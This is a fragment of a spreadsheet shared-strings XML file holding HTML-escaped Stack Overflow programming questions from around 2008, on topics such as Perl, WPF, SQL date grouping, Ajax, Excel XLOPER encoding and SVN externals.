  <si>
    <t>.net 2.0 sp1 on Windows 98</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been searching around for this and cannot seem to find a solid answer.  I know the 2.0 version of the .net framework is supported in Windows98, but does that include SP1?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I split a string into chunks of two characters each in Perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I take a string in Perl and split it up into an array with entries two characters long each?&lt;/p&gt;
&lt;p&gt;I attempted this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@array = split(/../, $string);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but did not get the expected results.&lt;/p&gt;
&lt;p&gt;Ultimately I want to turn something like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;F53CBBA476
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;in to an array containing&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;F5 3C BB A4 76
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Why is "array" marked as a reserved word in Visual-C++?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Visual Studio syntax highlighting colors this word blue as if it were a keyword or reserved word. I tried searching online for it but the word "array" throws the search off, I get mostly pages explaining what an array is. What is it used for?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Two 'self-updating' properties in WPF MVVM</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Considering you have an MVVM Architecture in WPF like &lt;a href="http://joshsmithonwpf.wordpress.com/2008/11/14/using-a-viewmodel-to-provide-meaningful-validation-error-messages/" rel="nofollow"&gt;Josh Smith's examples&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;How would you implement two properties 'synced' that update eachother? I have a Price property, and a PriceVatInclusive property in my model. &lt;/p&gt;
&lt;p&gt;-When the Price changes, I want to see the Vat inclusive price to automatically be 'Price * 1.21'. &lt;/p&gt;
&lt;p&gt;-Vice versa, when the PriceVatInclusive changes, I want the Price to be 'PriceVatInclusive / 1.21'&lt;/p&gt;
&lt;p&gt;Any ideas on that?&lt;/p&gt;
&lt;p&gt;And what if your model is a Entity framework entiry? You can't use the approach above then... no? Should you put calculating code in the ViewMOdel or ... ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get/Set in the c++ world, faux-pas?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I notice that get/set is not the c++ way as far as I can tell by looking at boost/stl, and even reading the writings of some of the top c++ experts.&lt;/p&gt;
&lt;p&gt;Does anyone use get/set in their c++ class design, and can someone suggest a rule of thumb on where if at all this paradigm belongs in the c++ world?&lt;/p&gt;
&lt;p&gt;It is obviously very popular in Java, and imitated by c# using Property syntactic sugar.&lt;/p&gt;
&lt;p&gt;EDIT:&lt;/p&gt;
&lt;p&gt;Well after reading more about this in one of the links provided in an answer below, I came across at least one argument for keeping the accessors of a member field the same name as the member field. Namely that you could simply expose the member field as public, and instead make it an instance of a class, and then overload the () operator. By using set/get, you'd force clients to not only recompile, but to actually change their code. &lt;/p&gt;
&lt;p&gt;Not sure I love the idea, seems a bit too fine grained to me, but more details are here:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.kirit.com/C%2B%2B%20killed%20the%20get%20%26%20set%20accessors"&gt;C++ Killed the Getter/Setter&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting started with SLIME and SWANK: Lisp connection closed unexpectedly: connection broken by remote peer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was trying to use the slime-connect function to get access to a remote server with sbcl. I followed all the steps from the slime.mov movie from &lt;a href="http://www.guba.com/watch/30000548671"&gt;Marco Baringer,&lt;/a&gt; but I got stuck when creating the ssh connection for slime. This is after already starting the swank server on the remote machine. I did it like this:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;ssh -L 4005:127.0.0.1:4005 user@server.com&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;And I got this errors, on local SLIME: &lt;/p&gt;
&lt;p&gt;Lisp connection closed unexpectedly: connection broken by remote peer &lt;/p&gt;
&lt;p&gt;...and on the remote server: &lt;/p&gt;
&lt;p&gt;channel 3: open failed: connect failed: Connection refused&lt;/p&gt;
&lt;p&gt;What could possibly be wrong?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Merging Visual Studio solution files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Microsoft Visual Studio (2005 and 2008) seems to have fun shuffling the Project IDs (GUIDs) around each time we do a little change in a solution. We found that this little detail leads to frustration each time someone has to merge branches in Source control...&lt;/p&gt;
&lt;p&gt;We though about coding a little tool to sort those Project ids before Check In. This way, merging would be easier. 
Is there some option that I missed in Visual Studio Options that would do just that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Adding event handlers by using reflection</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am adding dynamically controls to page by using LoadControl and Controls.Add. I need somehow to wrap Init and Load event handlers of this loaded controls into my code. So it should be such order of events &lt;em&gt;SomeMyCode() -&gt; Control.Init() -&gt; AnotherMyCode()&lt;/em&gt; and the same for Load &lt;em&gt;SomeMyCode() -&gt; Control.Load() -&gt; AnotherMyCode()&lt;/em&gt;.&lt;br/&gt;
My idea was to Get List of Control's event handlers for Init and Load events and add first and last event handers with code I should to run. But I cannot figure out how to do this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you databind to a System.Windows.Forms.Treeview control?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking at this control, and it seems to be lacking the standard .net "datasource" and "datamember" properties for databinding.  Is this control not bindable?  I can write some custom function that populates the treeview from a given data source, I suppose, and embed data objects as necessary, but is that the 'best practice'?  Or does everyone simply use a 3rd party treeview control?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP/CURL/Other - How resource intensive?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am going to have a daemon that will run on a FreeBSD server, which will exchange small amounts of data with a list of URIs every minute.&lt;/p&gt;
&lt;p&gt;I am thinking to use the curl_multi functions to run them all at once, or in groups, every minute, using a post.  I am open to other ideas though.  &lt;/p&gt;
&lt;p&gt;I will have to do some benchmarking later on, but for now, does anyone know how resource intensive it is to make many small posts with curl?  &lt;/p&gt;
&lt;p&gt;Is there a less intensive way to do this?  SOAP perhaps?  To start, there will only be a few every minute, but it may grow quickly.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Do you use the TR 24731 'safe' functions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The ISO C committee (&lt;a href="http://www.open-std.org/JTC1/SC22/WG14/"&gt;ISO/IEC JTC1/SC21/WG14&lt;/a&gt;) has published &lt;a href="http://www.open-std.org/JTC1/SC22/WG14/www/projects#24731-1"&gt;TR 24731-1&lt;/a&gt; and is working on &lt;a href="http://www.open-std.org/JTC1/SC22/WG14/www/projects#24731-1"&gt;TR 24731-2&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;h3&gt;TR 24731-1: Extensions to the C Library Part I: Bounds-checking interfaces&lt;/h3&gt;
  &lt;p&gt;WG14 is working on a TR on safer C library functions. This TR is oriented towards modifying existing programs, often by adding an extra parameter with the buffer length. The latest draft is in document N1225. A rationale is in document N1173. This is to become a Technical Report type 2.&lt;/p&gt;
  &lt;h3&gt;TR 24731-2: Extensions to the C Library - Part II: Dynamic allocation functions&lt;/h3&gt;
  &lt;p&gt;WG14 is working on a TR on safer C library functions. This TR is oriented towards new programs using dynamic allocation instead of an extra parameter for the buffer length. The latest draft is in document N1337. This is to become a Technical Report type 2.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Questions&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Do you use a library or compiler with support for the TR24731-1 functions?&lt;/li&gt;
&lt;li&gt;If so, which compiler or library and on which platform(s)?&lt;/li&gt;
&lt;li&gt;Did you uncover any bugs as a result of fixing your code to use these functions?&lt;/li&gt;
&lt;li&gt;Which functions provide the most value?&lt;/li&gt;
&lt;li&gt;Are there any that provide no value or negative value?&lt;/li&gt;
&lt;li&gt;Are you planning to use the library in the future?&lt;/li&gt;
&lt;li&gt;Are you tracking the TR24731-2 work at all?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>.NET CF 2.0: possible single-threaded reentrancy</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A simple application is written in CF 2.0. It's single-threaded as far as I'm concerned.&lt;/p&gt;
&lt;p&gt;Two parts of the application are of interest: an event handler that handles "Barcode scanned" event raised by a class that represents PDA's barcode scanner (provided by manufacturer), and an event handler for Windows.Forms.Timer that runs every 30 seconds.&lt;/p&gt;
&lt;p&gt;Recently the application suffered from a bug the only possible reason for which, as I can see, is processing Barcode Scanned event right in the middle of Timer_Tick event. I was absolutely sure that this was not possible and that one of the events would wait in the queue until first one is handled completely. Windows.Forms.Timer page in MSDN also assures that it's a regular single-threaded timer. Code triggered by Barcode Scanned changes some pieces of the interface, that causes no exceptions, so I'm assuming it's single-threaded as well. No, we're not using DoEvents or such.&lt;/p&gt;
&lt;p&gt;Can anybody tell me for sure that such reentrancy is not possible and I should look harder for other possible reasons, or vice versa, that they have suffered from the same problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Finding the Current Active Window in Mac OS X using Python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to find the application name of the current active window at a given time on Mac OS X using Python?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Check for column name in a SqlDataReader object</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I check to see if a column exists in a &lt;code&gt;SqlDataReader&lt;/code&gt; object?  In my data access layer, I have create a method that builds the same object for multiple stored procedures calls.  One of the stored procedures has an additional column that is not used by the other stored procedures.  I want to modified the method to accommodate for every scenario.&lt;/p&gt;
&lt;p&gt;My application is written in C#.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Simple (standalone) Java SOAP web service client from WSDL using Maven</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking to generate a simple standalone Java client which will make calls to a SOAP web service, given a wsdl.  When I say simple and standalone I mean that once I'm done I want to be able to do something like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import my.generated.nonsense;
public static void main(String[] args) {
    Client client = new Client();
    client.getSomething();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've had great time recently with Maven on some other projects and I want to keep that going, so would aim to use it here.  I don't want the tool to generate anything expect the classes that allow me to do the above.&lt;/p&gt;
&lt;p&gt;Anyone done this recently and can recommend a ws library and Maven plugin?  Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get the UTC time of "midnight" for a given timezone?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The best I can come up with for now is this monstrosity:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; datetime.utcnow() \
...   .replace(tzinfo=pytz.UTC) \
...   .astimezone(pytz.timezone("Australia/Melbourne")) \
...   .replace(hour=0,minute=0,second=0,microsecond=0) \
...   .astimezone(pytz.UTC) \
...   .replace(tzinfo=None)
datetime.datetime(2008, 12, 16, 13, 0)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I.e., in English, get the current time (in UTC), convert it to some other timezone, set the time to midnight, then convert back to UTC.&lt;/p&gt;
&lt;p&gt;I'm not just using now() or localtime() as that would use the server's timezone, not the user's timezone.&lt;/p&gt;
&lt;p&gt;I can't help feeling I'm missing something, any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How would you attack this polymorphism string building problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Sorry for not so discrptive title, if someone wants to change it go ahead.  Also note I have already asked a &lt;a href="http://stackoverflow.com/questions/361742/would-this-be-a-good-case-for-polymorphism"&gt;question&lt;/a&gt; about this kind of thing but this one is more about how you would attack it because my attack just doesn't seem to feel right.&lt;/p&gt;
&lt;p&gt;I am having a problem with building a string up to send to an OLE object in the correct order using the polymorphism method in the other question.  &lt;/p&gt;
&lt;p&gt;The OLE object can only take and receive a string, so what I am doing is building a wrapper around all the common commands and providing a more .NET feel for them.&lt;/p&gt;
&lt;p&gt;The problem I ran into very fast was some of the commands that my wrapper had to send where very long and had optional bits which then suddenly turned a method that was only setting a name into a big string building method with if's just to set a name and of course this happens all over the place because there are a lot of commands.&lt;/p&gt;
&lt;p&gt;Now in order to have a good wrapper I would like to be able to wrap up the string building process so that I move the string building logic away from the wrapper itself and into a builder object.  &lt;br&gt;I tried to attack this by using polymorphism which works well when I have a &lt;strong&gt;builder object&lt;/strong&gt; class designed just for building that one type of command string. See other post for details.&lt;/p&gt;
&lt;p&gt;Sorry for the long post I will cut to the chase now.&lt;/p&gt;
&lt;p&gt;The main problem is that there is a lot of command strings that have to be built up which means more &lt;strong&gt;builder objects&lt;/strong&gt;.
&lt;br&gt; So I would really like to have a generic string builder that can build a string from any list of commands but the catch is they have to be in the &lt;strong&gt;correct order&lt;/strong&gt; even if the user sets them in the wrong order.&lt;/p&gt;
&lt;p&gt;How would you approach this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Insert Dates in the return from a query where there is none</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are building a query to count the number of events per hour, per day. Most days there are hours that do not have any activity and therefore where the query is run the count of activities per hour show up but there are gaps and the query excludes these. We still want to show the hours that do not have activity and display a zero so that zero value can then be charted. The query we using looks like this â€¦&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select datepart(Year, dev_time) as Year,
    datepart(Month, dev_time) as Month,
    datepart(Day, dev_time) as Day,
    datepart(Hour, dev_time) as Hour,
    count(tdm_msg) as Total_ACTIVITES
from TCKT_ACT
where tdm_msg = â€˜4162â€² and dev_time &amp;gt;= DATEADD(day, - 1, GETDATE())
group by datepart(Year, dev_time) ,
    datepart(Month, dev_time) ,
    datepart(Day, dev_time),
    datepart(Hour, dev_time)
order by datepart(Year, dev_time) asc,
    datepart(Month, dev_time) asc,
    datepart(Day, dev_time) asc,
    datepart(Hour, dev_time) asc
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Can Flash Remoting run through a HTTP (Squid) proxy server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a network were would like like to deliver data using the Flash Remoting data format over HTTP.  We have Squid working as a reverse proxy/accelerator, are there any known problems running this traffic through Squid.  We would configure that particular URL to not be cached.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I write out or read in a Perl hash of arrays?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a program in Perl I'm working on where I would need multiple keys, and a way of giving each key multiple values and follow that by being able to both read them in and write them out to an external file depending on if the key matches what the person enters into standard input. I've looked across several sites and have found information somewhat useful in reading in hashes of arrays, but not writing them out, and I would also need to be able able to add to the array in the external file.&lt;/p&gt;
&lt;p&gt;Is this possible?&lt;/p&gt;
&lt;p&gt;Edit:
Is there a way that it could be done with starter Perl? I'm a beginner. Hashes of arrays seemed like the best way to make it work, but what I really need is a way to show multiple values for the same key while only showing the key once.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is App_Offline failing to work as soon as you it starts loading dlls?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Could anyone please help me with this. On the production site app_offline.htm works only till you start uploading dlls. As soon as you start uploading dlls it throws following error"Could not load file or assembly 'SubSonic' or one of its dependencies. 
&lt;strong&gt;The process cannot access the file because it is being used by another process.&lt;/strong&gt;
Now this clearly shows that IIS is still trying to serve the aspx page?? Is there anything I am missing here?? Any help would be appreciated. I have spent hours googling but to no avail.
Thanks in advance.
Manisha&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to Check for Image in Cache Using Silverlight</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am creating a basic image browsing application using Silverlight.  Depending on the user's connection speed, some images may take time to appear once they click on the thumb nail.  I would like to show a progress bar while it is being downloaded.  I have this part done.&lt;/p&gt;
&lt;p&gt;However, if the image is already in the cache (viewing a previous image), I'd rather not have the progress bar flash up and then disappear.  Is there a way to see if a particular file is in the cache before I display my progress bar?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there well known algorithms for deducing the "return types" of parser rules?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given a grammar and the attached action code, are there any standard solution for deducing what type each production needs to result in (and consequently, what type the invoking production should expect to get from it)?&lt;/p&gt;
&lt;p&gt;I'm thinking of an OO program and action code that employs something like c#'s &lt;code&gt;var&lt;/code&gt; syntax (but I'm not looking for something that is c# specific).&lt;/p&gt;
&lt;p&gt;This would be fairly simple if it were not for function overloading and recursive grammars.&lt;/p&gt;
&lt;p&gt;The issue arises with cases like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Foo ::= 
    Bar Baz { return Fig(Bar, Baz); }
    Foo Pit { return Pop(Foo, Pit); } // typeof(foo) = fn(typeof(Foo))
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Unix command to find lines common in two files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm sure I once found a unix command which could print the common lines from two or more files, does anyone know its name? It was much simpler than &lt;code&gt;diff&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>To Disable The BackButton Of Browser Window Using Javascript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Possible Duplicate:&lt;/strong&gt;&lt;br&gt;
  &lt;a href="http://stackoverflow.com/questions/87422/disabling-back-button-on-the-browser"&gt;Disabling Back button on the browser&lt;/a&gt;  &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Hi Guys,
       I need to disable the backbutton of browser window.When I click on backbutton,I need to show one message using alert or other means.Any one can help me &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does stdafx.h work the way it does?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As usual, when my brain's messing with something I can't figure out myself, I come to you guys for help :)&lt;/p&gt;
&lt;p&gt;This time I've been wondering why stdafx.h works the way it does? To my understanding it does 2 things:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Includes standard headers which we
&lt;em&gt;might&lt;/em&gt; (?) use and which are rarely changed&lt;/li&gt;
&lt;li&gt;Work as a compiler-bookmark for when
code is no longer precompiled.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Now, these 2 things seems like two very different tasks to me, and I wonder why they didn't do two seperate steps to take care of them? To me it seems reasonable to have a #pragma-command do the bookmarking stuff and to optionally have a header-file a long the lines of windows.h to do the including of often-used headers... Which brings me to my next point: Why are we forced to include often-used headers through stdafx.h? Personally, I'm not aware of any often used headers I use that I'm not already doing my own includes for - but maybe these headers are necessary for .dll generation?&lt;/p&gt;
&lt;p&gt;Thx in advance&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to change font color of disabled input in Firefox</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I disable input elements the text is taking the font color: "#000000" in Firefox. This is not happening in IE. Please check the below page in IE and Firefox. Let me know how to give it a gray look as in IE.&lt;br /&gt;
&lt;a href="http://shivanand.in/tmp/test.html"&gt;test&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Finding available LPT (parallel) ports and addresses in Delphi</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am doing direct I/O on a parallel port which is fine and necessary for speed. I would like to enumerate the available ports to offer the user a choice of ports at setup time rather than a tedious trawl through device manager to read the address manually. Does anyone know a means of doing this please?
Many thanks,
Brian&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Set folder permissions with C# - convert CreateObject("Wscript.Shell") from vb to C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to know how to convert this vb script to C#&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim strFolder As String
Dim objShell As Object
strFolder = "C:\zz"
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "%COMSPEC% /c Echo Y| cacls " &amp;amp; _
                 strFolder &amp;amp; _
                 " /t /c /g everyone:F ", 2, True
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What I'm trying to do is set permissions to "Everyone" on a newly created folder on the users C:\ drive.&lt;/p&gt;
&lt;p&gt;I'm using Visual Studio, .Net 1.1&lt;/p&gt;
&lt;p&gt;Thanks.
Iain&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Configuring root directory internal ASP.NET server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My ASP.NET always starts like this with the internal server:
&lt;a href="http://localhost:50793/Website/" rel="nofollow"&gt;http://localhost:50793/Website/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I use FckEditor which points to &lt;a href="http://localhost:50793/fckeditor" rel="nofollow"&gt;http://localhost:50793/fckeditor&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;How do I configure the server that it servers my folder "Website" as the root?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I render a different controller's action from within a view?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know that within a view I can render an action from the same controller using Html.RenderPartial. However, I need to render the output from an action under a different controller. What is the best way to do this? I would prefer to do this directly within the view, rather than doing it in the controller and saving the output to a ViewData variable.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where is a python real project to be used as example for the unit-test part?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a python project to use as example to copy the design of the unit test parts.&lt;/p&gt;
&lt;p&gt;The project should have these features:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;its code is almost fully unit tested&lt;/li&gt;
&lt;li&gt;the code is distributed in many packages, there are more that one level of packages &lt;/li&gt;
&lt;li&gt;all the test can be run with a single command, for example with &lt;code&gt;python test.py&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I need that the project should use the same test convention for all the code contained. I saw the whole python project but the the various packages are tested with different conventions. For example the setuptools packages uses an ad hoc adaption of unittest library while the other packages doesn't. &lt;/p&gt;
&lt;p&gt;I need that the project doesn't use a ad-hoc or a highly customized testing framework, because I want reuse its test architecture in my project.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ajax hyperlinking</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a problem in giving Ajax functionality to a hyperlink. I have files &lt;code&gt;Link.html&lt;/code&gt; and &lt;code&gt;GetCustomerdata.php&lt;/code&gt;. The main function of the HTML is send the data to &lt;code&gt;getCutomerData.php&lt;/code&gt; and shows flash as "success".&lt;/p&gt;
&lt;p&gt;And also I do not want hyperlinking,&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;a href="#"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Instead I need it in terms of:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;a href=GetCustomer.php?id=&amp;lt;format&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is it possible to clear?&lt;/p&gt;
&lt;h3&gt;Link.Html&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;html&amp;gt;
    &amp;lt;head&amp;gt;
        &amp;lt;title&amp;gt;Customer Account Information&amp;lt;/title&amp;gt;
        &amp;lt;script type="text/javascript"&amp;gt;
            var url = "GetCustomerData.php?id="; // The server-side script
            function handleHttpResponse() {
                if (http.readyState == 4) {
                    if(http.status==200) {
                        var results=http.responseText;
                        document.getElementById('divCustomerInfo').innerHTML = results;
                    }
                }
            }
            function requestCustomerInfo() {
                var sId =10;
                document.getElementById("txtCustomerId").value;
                http.open("GET", url + escape(sId), true);
                http.onreadystatechange = handleHttpResponse;
                http.send(null);
            }
            function getHTTPObject() {
                var xmlhttp;
                if(window.XMLHttpRequest){
                    xmlhttp = new XMLHttpRequest();
                }
                else
                    if (window.ActiveXObject){
                        xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
                        if (!xmlhttp){
                            xmlhttp=new ActiveXObject("Msxml2.XMLHTTP");
                        }
                    }
                return xmlhttp;
            }
            var http = getHTTPObject();
        &amp;lt;/script&amp;gt;
    &amp;lt;/head&amp;gt;
    &amp;lt;body&amp;gt;
        &amp;lt;a href="getCustomerData.php?id=10&amp;amp;onclick="requestCustomerInfo();return false;"&amp;gt;Show Me&amp;lt;/a&amp;gt;
        &amp;lt;div id="divCustomerInfo"&amp;gt;&amp;lt;/div&amp;gt;
    &amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...&lt;/p&gt;
&lt;p&gt;And my PHP file just flashes the suceess message:&lt;/p&gt;
&lt;h3&gt;getCustomerData.php&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
    echo "Success"
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to be able to select a portion of the screen?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In some screen capture software when you press a key it's possible for the client to select a portion of the screen. How can I implement that in my software written in framework 2.0 .Net?&lt;/p&gt;
&lt;p&gt;Here is a image of what I would like to do : &lt;a href="http://img341.imageshack.us/img341/3782/portionpb9.png" rel="nofollow"&gt;http://img341.imageshack.us/img341/3782/portionpb9.png&lt;/a&gt; you see, I can select a portion of the screen. How can I do that?&lt;/p&gt;
&lt;p&gt;I do not want to know how to take a screenshot... any one?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I generate multiple classes from xsd's with common includes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Aloha&lt;/p&gt;
&lt;p&gt;I received a few nice xsd files which I want to convert to classes (using xsd.exe)
All the xsd's have the same includes, like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;xs:include schemaLocation="kstypes.xsd" /&amp;gt;
&amp;lt;xs:include schemaLocation="ksparams.xsd" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I generate a class for each xsd the types declared in these files are duplicated for each original xsd. Is there any easy way to 1) only generate the types in the included xsd's once and 2) make sure all other classes use these types?&lt;/p&gt;
&lt;p&gt;-Edoode&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Returning Japanese characters via char* in an Excel XLOPER</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am retrieving Japanese characters from a data source and I want to return this data to Excel in an XLOPER.  I am using a Japanese version of Excel 2003 (hence XLOPERs and not XLOPER12s).&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;wchar_t* pszW = OLE2W(bstrResult); //I have the data I am trying to copy in a CComBSTR
ULONG ulSize = ::WideCharToMultiByte( CP_THREAD_ACP, 0, pszW, -1, NULL, 0, NULL, NULL );                        
if ( ulSize )
{   
   char* tmp = new char[ulSize + 1];
   tmp[ulSize]='\0';
   ::WideCharToMultiByte( CP_THREAD_ACP, 0, pszW, -1, LPSTR( tmp ), ulSize, NULL, NULL );
   pszReturn = tmp;     
}
wchar_t* pwszOut = new wchar_t[bstrResult.Length () + 1];
//now turn it back to test that that the correct code page was used. For debugging purposes only!
::MultiByteToWideChar (CP_THREAD_ACP,0, LPSTR(pszReturn),-1,pwszOut,bstrResult.Length () + 1);
//pwszOut and bstrResult look the same in the debugger              
delete [] pwszOut;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The parameter pszReturn is assigned to an XLOPER.  The problem I have is that â€œã‚¢ãƒ•ãƒªã‚«ã®å¥³çŽ‹â€ is displayed as â€œÆ’AÆ’tÆ’Å Æ’Jâ€šÃŒâ€”â€°Â¤â€ in Excel.&lt;/p&gt;
&lt;p&gt;Manually setting the code page to 932 yields the same results as CP_THREAD_ACP so I think that that part is correct.&lt;/p&gt;
&lt;p&gt;Any help would be greatly appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Will an svn:external subdirectory sync with its HEAD revision upon every 'svn update' to the parent working copy?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On &lt;a href="http://svnbook.red-bean.com/en/1.0/ch07s03.html" rel="nofollow"&gt;this page in the Subversion manual&lt;/a&gt;, it says that "When you commit a change to the svn:externals property, Subversion will synchronize the checked-out items against the changed externals definition when you next run svn update. The same thing will happen when others update their working copies and receive your changes to the externals definition."&lt;/p&gt;
&lt;p&gt;If you have not specified a revision number for the external, I assume the HEAD revision is used.  So, will the subdir managed by the external property update to its HEAD revision each and every time 'svn update' is run against the parent working copy?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to print to a null printer in .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to write a unit test for a method that will print a document.  Is there an easy way to send the output to the Windows equivalent of /dev/null?  I'm guessing that having our build server print a document on every check in is going to get expensive quickly.  ;)&lt;/p&gt;
&lt;p&gt;Ideally, this would work on both our build server (which has no default printer) and our development machines (which do), so I'd prefer not to change the default printer.&lt;/p&gt;
&lt;p&gt;Thanks for all the wonderful answers that will undoubtedly follow this fascinating question.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there any plans to officially support Django with IIS?</t>
  </si>
  <si>
